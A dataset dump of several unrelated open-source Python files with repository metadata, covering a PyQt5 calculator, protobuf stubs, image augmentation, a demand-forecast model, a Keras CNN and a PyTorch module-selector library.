data = os.path.join(git.Repo('.', search_parent_directories=True).working_tree_dir, 'data')
dataframe_dict = {'airlines': pd.read_csv(os.path.join(data, 'airlines', 'airlines.csv')),
'flights': pd.read_csv(os.path.join(data, 'flights', 'flights.csv')),
'airports': pd.read_csv(os.path.join(data, 'airports', 'airports.csv'))}
result = find_related_cols_by_name(dataframe_dict, result)
self.assertEqual(expected, result)
def test_find_related_cols_by_content(self):
# ---pecan cookies sprint one test case---
expected = {
'airports': {'dest': {'relationships': ['flights.origin', 'flights.dest']},
'dest_city': {'relationships': ['flights.origin_city']},
'dest_state': {'relationships': ['flights.origin_state']}},
'airlines': {'carrier': {'relationships': ['flights.carrier']}},
"flights": {
"flight_id": {"relationships": []},
"origin": {"relationships": ["airports.dest"]},
"origin_city": {"relationships": ["airports.dest_city"]},
"origin_state": {"relationships": ["airports.dest_state"]},
"dest": {"relationships": ["airports.dest"]},
"distance_group": {"relationships": []},
"carrier": {"relationships": ["airlines.carrier"]},
"flight_num": {"relationships": []},
"first_trip_logs_time": {"relationships": []}}
}
data_list = pecan_cookies_load_data()
result = find_related_cols_by_content(data_list)
self.assertEqual(expected, result)
#result = find_parent_child_relationships(None, result)
#self.assertEqual(expected, result)
if __name__ == '__main__':
unittest.main()
| 49.841463 | 111 | 0.477857 | 3,743 | 0.915831 | 0 | 0 | 0 | 0 | 0 | 0 | 1,447 | 0.354049 |
907488d52d48e24b4d69fb2af57f6618dc2c3ce3 | 2,836 | py | Python | Calculator.py | KunalKatiyar/Calculator | 74044d32b08738ef288ccfae6bb322e6ab05f608 | [
"MIT"
]
| null | null | null | Calculator.py | KunalKatiyar/Calculator | 74044d32b08738ef288ccfae6bb322e6ab05f608 | [
"MIT"
]
| null | null | null | Calculator.py | KunalKatiyar/Calculator | 74044d32b08738ef288ccfae6bb322e6ab05f608 | [
"MIT"
]
| null | null | null | import sys
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QHBoxLayout, QGroupBox, QDialog, QVBoxLayout, QGridLayout,QMainWindow, QApplication, QWidget, QPushButton, QAction, QLineEdit, QMessageBox
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
class App(QDialog):
def __init__(self):
super().__init__()
self.title = 'Calculator'
self.left = 10
self.top = 10
self.width = 640
self.height = 480
self.initUI()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.createGridLayout()
windowLayout = QVBoxLayout()
windowLayout.addWidget(self.horizontalGroupBox)
self.setLayout(windowLayout)
self.textbox = QLineEdit(self)
self.textbox.move(20, 40)
self.textbox.resize(600,35)
# Original Approach
# buttonp = QPushButton('+', self)
# buttonp.setToolTip('Addition Operator')
# buttonp.move(100,70)
# buttonp.clicked.connect(self.on_click)
# buttonm = QPushButton('-', self)
# buttonm.setToolTip('Subtraction Operator')
# buttonm.move(100,100)
# buttonm.clicked.connect(self.on_click)
self.show()
def createGridLayout(self):
self.horizontalGroupBox = QGroupBox("Grid")
layout = QGridLayout()
# layout.setColumnStretch(1, 2)
# layout.setColumnStretch(2, 4)
layout.addWidget(QPushButton('1'),0,0)
layout.addWidget(QPushButton('2'),0,1)
layout.addWidget(QPushButton('3'),0,2)
layout.addWidget(QPushButton('4'),1,0)
layout.addWidget(QPushButton('5'),1,1)
layout.addWidget(QPushButton('6'),1,2)
layout.addWidget(QPushButton('7'),2,0)
layout.addWidget(QPushButton('8'),2,1)
layout.addWidget(QPushButton('9'),2,2)
layout.addWidget(QPushButton('0'),3,1)
layout.addWidget(QPushButton('.'),3,0)
layout.addWidget(QPushButton('='),3,2)
layout.addWidget(QPushButton('+'),0,4)
layout.addWidget(QPushButton('-'),1,4)
layout.addWidget(QPushButton('*'),2,4)
layout.addWidget(QPushButton('/'),3,4)
self.horizontalGroupBox.setLayout(layout)
# @pyqtSlot()
# def on_click(self):
# print('Button click')
@pyqtSlot()
def on_click(self):
textboxValue = "Good"
QMessageBox.question(self, 'Message - pythonspot.com', "You typed: " + textboxValue, QMessageBox.Ok, QMessageBox.Ok)
self.textbox.setText("Good")
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = App()
sys.exit(app.exec_()) | 35.45 | 203 | 0.605783 | 2,441 | 0.860719 | 0 | 0 | 231 | 0.081453 | 0 | 0 | 561 | 0.197814 |
9074ea5b2e3ca5610b7441955b3420b7ffce9518 | 1,446 | py | Python | analysis/src/util/_concepts.py | Domiii/code-dbgs | afe4d500273570e0b141ca0384cda3b52a191417 | [
"Apache-2.0"
]
| 95 | 2020-01-20T08:51:20.000Z | 2022-03-31T23:27:28.000Z | analysis/src/util/_concepts.py | Domiii/code-dbgs | afe4d500273570e0b141ca0384cda3b52a191417 | [
"Apache-2.0"
]
| 274 | 2020-07-11T11:10:10.000Z | 2022-03-31T14:03:39.000Z | analysis/src/util/_concepts.py | Domiii/code-dbgs | afe4d500273570e0b141ca0384cda3b52a191417 | [
"Apache-2.0"
]
| 9 | 2020-07-15T07:04:20.000Z | 2022-03-27T17:11:58.000Z | # // ###########################################################################
# // Queries
# // ###########################################################################
# -> get a single cell of a df (use `iloc` with `row` + `col` as arguments)
df.iloc[0]['staticContextId']
# -> get one column as a list
allFunctionNames = staticContexts[['displayName']].to_numpy().flatten().tolist()
# -> get all rows that match a condition
callLinked = staticTraces[~staticTraces['callId'].isin([0])]
# -> exclude columns
df.drop(['A', 'B'], axis=1)
# -> complex queries
staticTraces.query(f'callId == {callId} or resultCallId == {callId}')
# -> join queries (several examples)
# https://stackoverflow.com/a/40869861
df.set_index('key').join(other.set_index('key'))
B.query('client_id not in @A.client_id')
B[~B.client_id.isin(A.client_id)]
# merging dfs
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.merge.html
pd.merge(df1, df2, on=['A', 'B'])
df1.merge(df2, left_on='lkey', right_on='rkey')
# // ###########################################################################
# // Display
# // ###########################################################################
# -> display a groupby object (https://stackoverflow.com/questions/22691010/how-to-print-a-groupby-object)
groups = df.groupby('A')
for key, item in groups:
group = groups.get_group(key)
display(group)
# .to_numpy().flatten().tolist() | 34.428571 | 106 | 0.540111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 996 | 0.688797 |
907638a652d8418902c98ee951701aa5ff8b7dc1 | 2,279 | py | Python | src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 1a8639d6f2a2535ece30dde840c99ba8261b5d7d | [
"MIT"
]
| null | null | null | src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 1a8639d6f2a2535ece30dde840c99ba8261b5d7d | [
"MIT"
]
| null | null | null | src/py/proto/v3/diff/UniversalDiff_pb2.py | zifter/conf_protobuf | 1a8639d6f2a2535ece30dde840c99ba8261b5d7d | [
"MIT"
]
| null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: v3/diff/UniversalDiff.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from v3.diff import Transaction_pb2 as v3_dot_diff_dot_Transaction__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='v3/diff/UniversalDiff.proto',
package='v3.diff',
syntax='proto3',
serialized_pb=_b('\n\x1bv3/diff/UniversalDiff.proto\x12\x07v3.diff\x1a\x19v3/diff/Transaction.proto\";\n\rUniversalDiff\x12*\n\x0ctransactions\x18\x01 \x03(\x0b\x32\x14.v3.diff.Transactionb\x06proto3')
,
dependencies=[v3_dot_diff_dot_Transaction__pb2.DESCRIPTOR,])
_UNIVERSALDIFF = _descriptor.Descriptor(
name='UniversalDiff',
full_name='v3.diff.UniversalDiff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transactions', full_name='v3.diff.UniversalDiff.transactions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=126,
)
_UNIVERSALDIFF.fields_by_name['transactions'].message_type = v3_dot_diff_dot_Transaction__pb2._TRANSACTION
DESCRIPTOR.message_types_by_name['UniversalDiff'] = _UNIVERSALDIFF
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UniversalDiff = _reflection.GeneratedProtocolMessageType('UniversalDiff', (_message.Message,), dict(
DESCRIPTOR = _UNIVERSALDIFF,
__module__ = 'v3.diff.UniversalDiff_pb2'
# @@protoc_insertion_point(class_scope:v3.diff.UniversalDiff)
))
_sym_db.RegisterMessage(UniversalDiff)
# @@protoc_insertion_point(module_scope)
| 31.219178 | 203 | 0.777095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 635 | 0.278631 |
9076fc2a93a37415e1783c15ba456852ac6cdab0 | 4,549 | py | Python | src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
]
| 2 | 2022-03-28T09:46:38.000Z | 2022-03-28T14:12:32.000Z | src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
]
| null | null | null | src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import annotations
import numpy as np
import torch
from torch import Tensor
from onevision.data.augment.base import BaseAugment
from onevision.data.augment.utils import apply_transform_op
from onevision.data.data_class import ObjectAnnotation
from onevision.factory import AUGMENTS
__all__ = [
"ImageBoxAugment",
]
# MARK: - Modules
@AUGMENTS.register(name="image_box_augment")
class ImageBoxAugment(BaseAugment):
r"""
Args:
policy (str):
Augmentation policy. One of: [`scratch`, `finetune`].
Default: `scratch`.
"""
cfgs = {
"scratch": [
# (op_name, p, magnitude)
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.5, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
"finetune": [
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.8, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
}
# MARK: Magic Functions
def __init__(self, policy: str = "scratch", *args, **kwargs):
super().__init__(*args, **kwargs)
if policy not in self.cfgs:
raise ValueError(f"`policy` must be one of: {self.cfgs.keys()}."
f" But got: {policy}")
self.transforms = self.cfgs[policy]
def __repr__(self) -> str:
return self.__class__.__name__ + \
f"(policy={self.policy}, fill={self.fill})"
# MARK: Configure
def _augmentation_space(self, *args, **kwargs) -> dict[str, tuple[Tensor, bool]]:
pass
# MARK: Forward Pass
def forward(self, input: np.ndarray, target: np.ndarray) -> tuple[np.ndarray, np.ndarray]:
"""
Args:
input (np.ndarray):
Image to be transformed.
target (np.ndarray[*, 4):
Target to be transformed. Boxes in (x, y, x, y) format.
"""
# NOTE: Transform
transform_id = int(torch.randint(len(self.transforms), (1,)).item())
num_ops = len(self.transforms[transform_id])
probs = torch.rand((num_ops,))
for i, (op_name, p, magnitude) in enumerate(self.transforms[transform_id]):
if probs[i] > p:
continue
magnitude = magnitude if magnitude is not None else 0.0
if op_name == "image_box_random_perspective":
"""
target[:, 2:6] = box_cxcywh_norm_to_xyxy(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
nl = len(target) # Number of labels
if nl:
target = target
else:
target = np.zeros((nl, ObjectAnnotation.box_label_len()))
"""
target[:, 2:6] = box_xyxy_to_cxcywh_norm(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
else:
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
'''
elif op_name == "adjust_hsv":
input = adjust_hsv(
input,
h_factor = magnitude[0],
s_factor = magnitude[1],
v_factor = magnitude[2],
)
elif op_name == "hflip":
input = np.fliplr(input)
target[:, 2] = 1 - target[:, 2]
elif op_name == "vflip":
input = np.flipud(input)
target[:, 3] = 1 - target[:, 3]
'''
return input, target
| 32.726619 | 94 | 0.473071 | 4,088 | 0.898659 | 0 | 0 | 4,133 | 0.908551 | 0 | 0 | 1,770 | 0.389097 |
907746020f32a1228d26593b0db9dbd5b8907c24 | 2,087 | py | Python | dataviz/euvotes.py | Udzu/pudzu | 5a0302830b052fc54feba891eb7bf634957a9d90 | [
"MIT"
]
| 119 | 2017-07-22T15:02:30.000Z | 2021-08-02T10:42:59.000Z | dataviz/euvotes.py | Udzu/pudzu | 5a0302830b052fc54feba891eb7bf634957a9d90 | [
"MIT"
]
| null | null | null | dataviz/euvotes.py | Udzu/pudzu | 5a0302830b052fc54feba891eb7bf634957a9d90 | [
"MIT"
]
| 28 | 2017-08-04T14:28:41.000Z | 2019-11-27T23:46:14.000Z | from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import seaborn as sns
# generate map
df = pd.read_csv("datasets/euvotes.csv").set_index('country')
palette = tmap(RGBA, sns.cubehelix_palette(11, start=0.2, rot=-0.75))
ranges = [20000000,10000000,5000000,2000000,1000000,500000,200000,100000,0]
def votecolfn(n):
return palette[8 - next(i for i,x in enumerate(ranges) if n >= x)]
def colorfn(c):
if c not in df.index:
return "white" if c in ['Sea', 'Borders'] else "grey"
return votecolfn(int(df.loc[c].votes))
def labelfn(c):
if c not in df.index: return None
dfc = df.loc[c]
label = "{name} '{year}\n({votes:.2g}M)".format(name=dfc.leader.split(" ")[-1], year=dfc.year[2:], votes=int(dfc.votes) / 1000000)
return Image.from_text(label, arial(14, bold=True), align="center", padding=2)
map = map_chart("maps/Europe.png", colorfn, labelfn)
# legend
def box(c):
return Image.new("RGBA", (30, 30), c).place(Image.from_text("", arial(16, bold=True), "black", bg=c))
vote_arr = Image.from_array([
[box(votecolfn(n)), Image.from_text("<0.1M" if n < 100000 else ">{:.2g}M".format(n/1000000), arial(16), padding=(10,0))] for n in ranges
], bg="white", xalign=0)
vote_leg = Image.from_column([Image.from_text("# votes", arial(16, bold=True)), vote_arr], bg="white", xalign=0, padding=(0,5))
note_leg = Image.from_text("Multi-party national elections for executive head or party.", arial(16), max_width=100, bg="white", padding=(0,2))
legend = Image.from_column([vote_leg, note_leg], bg="white", xalign=0, padding=5).pad(1, "black")
chart = map.place(legend, align=(1,0), padding=10)
title = Image.from_column([
Image.from_text("EUROPEAN POPULAR VOTE RECORDS", arial(48, bold=True)),
Image.from_text("candidate or party with the highest absolute popular vote", arial(36))],
bg="white")
img = Image.from_column([title, chart], bg="white", padding=2)
img.place(Image.from_text("/u/Udzu", font("arial", 16), fg="black", bg="white", padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/euvotes.png")
| 44.404255 | 148 | 0.684236 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 438 | 0.209871 |
9078e83afbdbc37dbf8bc13a26fcecb893de7fcb | 6,264 | py | Python | WarmUpSTE.py | jrolf/jse-api | 72cf6ce9f5fb54564872795f058cb06afe34ca75 | [
"MIT"
]
| 1 | 2019-09-19T23:20:57.000Z | 2019-09-19T23:20:57.000Z | WarmUpSTE.py | jrolf/jse-api | 72cf6ce9f5fb54564872795f058cb06afe34ca75 | [
"MIT"
]
| 1 | 2019-09-19T23:24:38.000Z | 2019-09-19T23:24:38.000Z | WarmUpSTE.py | jrolf/jse-api | 72cf6ce9f5fb54564872795f058cb06afe34ca75 | [
"MIT"
]
| 1 | 2019-09-19T20:12:10.000Z | 2019-09-19T20:12:10.000Z |
import pandas as pd
import numpy as np
from copy import *
from bisect import *
from scipy.optimize import curve_fit
from sklearn.metrics import *
from collections import defaultdict as defd
import datetime,pickle
from DemandHelper import *
import warnings
warnings.filterwarnings("ignore")
#################################################################
#################################################################
#################################################################
class DemandForecastModel:
def __init__(self,rank_model='',forecast='',rmodel_beta=1.0,final_beta=1.0):
if rank_model != '':
self.ingest(rank_model,forecast,rmodel_beta,final_beta)
def ingest(self,rank_model,forecast,rmodel_beta=1.0,final_beta=1.0):
self.rank_model = rank_model
self.rmodel_beta = rmodel_beta
self.forecast = forecast
self.final_beta = final_beta
self.alldates = sorted(forecast.index)
def predict(self,rank=10000,date='2018-07-04',buybox=100):
if 'str' not in str(type(date)): date = str(date)[:10]
pred1 = self.rank_model.predict([rank])[0]
pred2 = pred1*self.rmodel_beta
d = self.forecast.loc[date]
mid,lo,hi = d['yhat'],d['yhat_lower'],d['yhat_upper']
rdr_preds = np.array([lo,mid,hi])
pred3 = pred2*rdr_preds
pred4 = pred3*self.final_beta
pred5 = global2local(pred4,buybox)
return pred5
#################################################################
#################################################################
# Export a fitted model to text file:
# These filenames normally end in '.pkl'
def ExportModel(filename,model_object):
pickle.dump(model_object, open(filename, 'wb'))
print('Model Saved TO: '+filename)
# Import a fitted model from text file:
# These filenames normally end in '.pkl'
def ImportModel(filename):
model_object = pickle.load(open(filename, 'rb'))
print('Model Imported FROM: '+filename)
return model_object
def GetToday():
today = datetime.datetime.today()
return str(today)[:10]
#################################################################
#################################################################
#################################################################
short2long = {
'H&G' : 'Home & Garden',
'L&G' : 'Lawn & Garden',
'SPORTS' : 'Sports & Outdoors',
'HI' : 'Home Improvement',
'TOY' : 'Toys & Games',
'KIT' : 'Home & Kitchen',
}
long2short = {}
for short in sorted(short2long):
long2short[short2long[short]] = short
Shorts = sorted(short2long)
Longs = sorted(long2short)
def ConvertToShort(thing):
if thing in long2short: return long2short[thing]
return thing
Models2 = {}
for SH in Shorts:
fn = 'MODELS/'+SH+'/DFM2.pkl'
model = ImportModel(fn)
Models2[SH] = model
AllDates = sorted(set([str(a)[:10] for a in Models2['H&G'].alldates]))
#################################################################
#################################################################
# Returns a list of valid category names:
def GetCategories2():
return sorted(long2short)
# SPREETAIL DEMAND PREDICTION:
# cat : Category (String or List)
# rank : Sales Rank (Integer, 2-List, Long-List)
# date1 : First Date of Forecast ("2018-09-03")
# date2 : Final Date of Forecast OR # Days Forward ("2018-10-03" or 30)
# bb_ratio : BuyBox Percent (100.0)
# md_ratio : Marketplace Distribution Percent
def SpreetailPredict(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
if (not date1) or (str(date1).lower()=='today'): date1 = GetToday()
index1 = bisect_left(AllDates,date1)
if len(str(date2)) >10: date2 = str(date2)[:10]
if len(str(date2))==10: index2 = bisect_left(AllDates,date2)
else: index2 = index1+int(date2)
index_dif = abs(index2-index1)
index1 = min([index1,index2])
index2 = index1+index_dif
DateRange = AllDates[index1:index2+1]
LEN = len(DateRange)
#--------------------------------------
tdf = pd.DataFrame()
tdf['DATE'] = DateRange
#--------------------------------------
if 'list' in str(type(cat)):
cat = [ConvertToShort(a) for a in cat]
if len(cat)==LEN: tdf['CAT'] = cat
else: tdf['CAT'] = cat[0]
else: tdf['CAT'] = ConvertToShort(cat)
#--------------------------------------
if 'list' in str(type(rank)):
if len(rank)==LEN: tdf['RANK'] = rank
elif len(rank)==2:
r1,r2 = tuple(rank)
tdf['RANK'] = np.linspace(r1,r2,LEN)
else: tdf['RANK'] = rank[0]
else: tdf['RANK'] = rank
#--------------------------------------
md_ratio2 = max(0.3,min(md_ratio,0.99))
other_ratio = (1.0-md_ratio2)/md_ratio2
tdf['BBR'] = bb_ratio
tdf['MDR'] = md_ratio2
#--------------------------------------
M = tdf.values
results = []
for row in M:
d,c,r = tuple(row[:3])
pred_100 = Models2[c].predict(r,d,100.0)
pred_bbr = Models2[c].predict(r,d,100.0*bb_ratio)
results.append([pred_100,pred_bbr])
tdf['P_100'] = [r[0][1] for r in results]
tdf['P_100_HI'] = [r[0][2] for r in results]
tdf['P_100_LO'] = [r[0][0] for r in results]
tdf['P_BBR'] = [r[1][1] for r in results]
tdf['P_BBR_HI'] = [r[1][2] for r in results]
tdf['P_BBR_LO'] = [r[1][0] for r in results]
tdf['P_OTH'] = other_ratio * tdf['P_100']
tdf['P_OTH_HI'] = other_ratio * tdf['P_100_HI']
tdf['P_OTH_LO'] = other_ratio * tdf['P_100_LO']
tdf['P_TOT'] = tdf['P_BBR'] +tdf['P_OTH']
tdf['P_TOT_HI'] = tdf['P_BBR_HI']+tdf['P_OTH_HI']
tdf['P_TOT_LO'] = tdf['P_BBR_LO']+tdf['P_OTH_LO']
cols = list(tdf.columns)[5:]
for col in cols:
col2 = col+'_C'
tdf[col2] = np.cumsum(tdf[col])
Matrix = [list(tdf.columns)]
for row in tdf.values:
Matrix.append(list(row))
MainPred = list(tdf['P_TOT_C'])[-1]
return [MainPred,Matrix]
def SpreePred(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
result = SpreetailPredict(cat,rank,date1,date2,bb_ratio,md_ratio)
M = result[1]
cols,m = M[0],M[1:]
return pd.DataFrame(m,columns=cols)
#################################################################
#################################################################
# [END]
| 25.463415 | 81 | 0.543423 | 987 | 0.157567 | 0 | 0 | 0 | 0 | 0 | 0 | 2,071 | 0.330619 |
907a8e9bf17e1ccce65533dabf9db7c106ceba56 | 1,088 | py | Python | Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 90f110158cbf0ce02fd4d5d09e3b2034428d9992 | [
"MIT"
]
| 7 | 2019-02-16T02:52:12.000Z | 2021-11-08T13:10:46.000Z | Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 90f110158cbf0ce02fd4d5d09e3b2034428d9992 | [
"MIT"
]
| null | null | null | Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 90f110158cbf0ce02fd4d5d09e3b2034428d9992 | [
"MIT"
]
| 14 | 2018-11-18T04:33:38.000Z | 2021-08-14T03:29:18.000Z | import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Flatten
from keras.layers import Conv2D, MaxPooling2D
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=(128, 128, 1)))
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=(128, 128, 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(10000, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd')
model.fit(x_train, y_train,
epochs=100,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test)
| 31.085714 | 51 | 0.669118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.080882 |
907b2f51dc7dc8191cd5bf95004855d172a84d81 | 15,373 | py | Python | k1lib/selector.py | 157239n/k1lib | 285520b8364ad5b21cb736b44471aa939e692e9b | [
"MIT"
]
| 1 | 2021-08-11T19:10:08.000Z | 2021-08-11T19:10:08.000Z | k1lib/selector.py | 157239n/k1lib | 285520b8364ad5b21cb736b44471aa939e692e9b | [
"MIT"
]
| null | null | null | k1lib/selector.py | 157239n/k1lib | 285520b8364ad5b21cb736b44471aa939e692e9b | [
"MIT"
]
| null | null | null | # AUTOGENERATED FILE! PLEASE DON'T EDIT
"""
This module is for selecting a subnetwork using CSS so that you can do special
things to them. Checkout the tutorial section for a walkthrough. This is exposed
automatically with::
from k1lib.imports import *
selector.select # exposed
"""
from torch import nn; import k1lib, re, torch
from typing import List, Tuple, Dict, Union, Any, Iterator, Callable
from contextlib import contextmanager; from functools import partial
__all__ = ["ModuleSelector", "preprocess", "select"]
def preprocess(selectors:str, defaultProp="*") -> List[str]:
r"""Removes all quirkly features allowed by the css
language, and outputs nice lines. Example::
# returns ["a:f", "a:g,h", "b:g,h", "t:*"]
selector.preprocess("a:f; a, b: g,h; t")
:param selectors: single css selector string. Statements separated
by "\\n" or ";"
:param defaultProp: default property, if statement doesn't have one"""
# filtering unwanted characters and quirky spaces
lines = [e for l in selectors.split("\n") for e in l.split(";")]
selectors = [re.sub("(^\s+)|(\s+$)", "", re.sub("\s\s+", " ", line)).replace(" >", ">").replace("> ", ">").replace(" :", ":").replace(": ", ":").replace(" ,", ",").replace(", ", ",").replace(";", "\n").replace(" \n", "\n").replace("\n ", "\n") for line in lines if line != ""]
# adding "*" to all selectors with no props specified
selectors = [selector if ":" in selector else f"{selector}:{defaultProp}" for selector in selectors]
# expanding comma-delimited selectors
return [f"{segment}:{selector.split(':')[1]}" for selector in selectors for segment in selector.split(":")[0].split(",")]
def _getParts(s:str): return [a for elem in s.split(":")[0].split(">") if elem for a in elem.split(" ") if a]
def _getProps(s:str): return [elem for elem in s.split(":")[1].split(",") if elem]
_idxAuto = k1lib.AutoIncrement()
class ModuleSelector: # empty methods so that Sphinx generates the docs in order
props:List[str]
"""Properties of this :class:`ModuleSelector`"""
idx:int
"""Unique id of this :class:`ModuleSelector` in the entire script. May be useful
for module recognition"""
nn:"torch.nn.Module"
"""The associated :class:`torch.nn.Module` of this :class:`ModuleSelector`"""
def __init__(self, parent:"ModuleSelector", name:str, nn:"torch.nn.Module"):
self.parent = parent; self.name = name; self.nn = nn
self._children:Dict["ModuleSelector"] = {}
self.props:List[str] = []; self.depth:int = 0
self.directSelectors:List[str] = []
self.indirectSelectors:List[str] = []
self.displayF:Callable[["ModuleSelector"], str] = lambda mS: ', '.join(mS.props)
self.idx = _idxAuto()
def deepestDepth(self): pass
def highlight(self, prop:str):
"""Highlights the specified prop when displaying the object."""
self.displayF = lambda self: (k1lib.fmt.txt.red if prop in self else k1lib.fmt.txt.identity)(', '.join(self.props))
return self
def __call__(self, *args, **kwargs):
"""Calls the internal :class:`torch.nn.Module`"""
return self.nn(*args, **kwargs)
def __contains__(self): pass
def named_children(self): pass
def children(self): pass
def named_modules(self): pass
def modules(self): pass
def directParams(self): pass
def parse(self): pass
def apply(self): pass
def clearProps(self): pass
@property
def displayF(self):
"""Function to display each ModuleSelector's lines.
Default is just::
lambda mS: ", ".join(mS.props) """
return self._displayF
@displayF.setter
def displayF(self, f):
def applyF(self): self._displayF = f
self.apply(applyF)
def __getattr__(self, attr):
if attr.startswith("_"): raise AttributeError(attr)
if attr in self._children: return self._children[attr]
return self.directParams[attr]
def __getitem__(self, idx): return getattr(self, str(idx))
@staticmethod
def sample() -> "ModuleSelector":
"""Create a new example :class:`ModuleSelector` that has a bit of
hierarchy to them, with no css."""
return nn.Sequential(nn.Linear(3, 4), nn.Sequential(nn.Conv2d(3, 8, 3, 2), nn.ReLU(), nn.Linear(5, 6)), nn.Linear(7, 8)).select("")
def hookF(self): pass
def hookFp(self): pass
def hookB(self): pass
def freeze(self): pass
def unfreeze(self): pass
@k1lib.patch(nn.Module)
def select(model:"torch.nn.Module", css:str="*") -> "k1lib.selector.ModuleSelector":
"""Creates a new ModuleSelector, in sync with a model.
Example::
mS = selector.select(nn.Linear(3, 4), "#root:propA")
Or, you can do it the more direct way::
mS = nn.Linear(3, 4).select("#root:propA")
:param model: the :class:`torch.nn.Module` object to select from
:param css: the css selectors"""
root = ModuleSelector(None, "root", model)
root.parse(preprocess(css)); return root
@k1lib.patch(ModuleSelector, name="apply")
def _apply(self, f:Callable[[ModuleSelector], None]):
"""Applies a function to self and all child :class:`ModuleSelector`"""
f(self)
for child in self._children.values(): child.apply(f)
@k1lib.patch(ModuleSelector, name="parse")
def _parse(self, selectors:Union[List[str], str]) -> ModuleSelector:
"""Parses extra selectors. Clears all old selectors, but retain
the props. Returns self. Example::
mS = selector.ModuleSelector.sample().parse("Conv2d:propA")
# returns True
"propA" in mS[1][0]
:param selectors: can be the preprocessed list, or the unprocessed css string"""
if isinstance(selectors, str): selectors = preprocess(selectors)
self.directSelectors = []; self.indirectSelectors = []
ogSelectors = selectors
if self.parent != None:
selectors = [] + selectors + self.parent.indirectSelectors + self.parent.directSelectors
self.indirectSelectors += self.parent.indirectSelectors
self.depth = self.parent.depth + 1
for selector in selectors:
parts = _getParts(selector)
matches = parts[0] == self.nn.__class__.__name__ or parts[0] == "#" + self.name or parts[0] == "*"
if len(parts) == 1:
if matches: self.props += _getProps(selector)
else:
a = selector.find(">"); a = a if a > 0 else float("inf")
b = selector.find(" "); b = b if b > 0 else float("inf")
direct = a < b
if matches:
if direct: self.directSelectors.append(selector[a+1:])
else: self.indirectSelectors.append(selector[b+1:])
for name, mod in self.nn.named_children():
if name not in self._children:
self._children[name] = ModuleSelector(self, name, mod)
self._children[name].parse(ogSelectors)
self.props = list(set(self.props)); return self
@k1lib.patch(ModuleSelector)
def __contains__(self, prop:str=None) -> bool:
"""Whether this :class:`ModuleSelector` has a specific prop.
Example::
# returns True
"b" in nn.Linear(3, 4).select("*:b")
# returns False
"h" in nn.Linear(3, 4).select("*:b")
# returns True, "*" here means the ModuleSelector has any properties at all
"*" in nn.Linear(3, 4).select("*:b")"""
if "*" in self.props: return True
if prop in self.props: return True
if prop == "*" and len(self.props) > 0: return True
return False
@k1lib.patch(ModuleSelector)
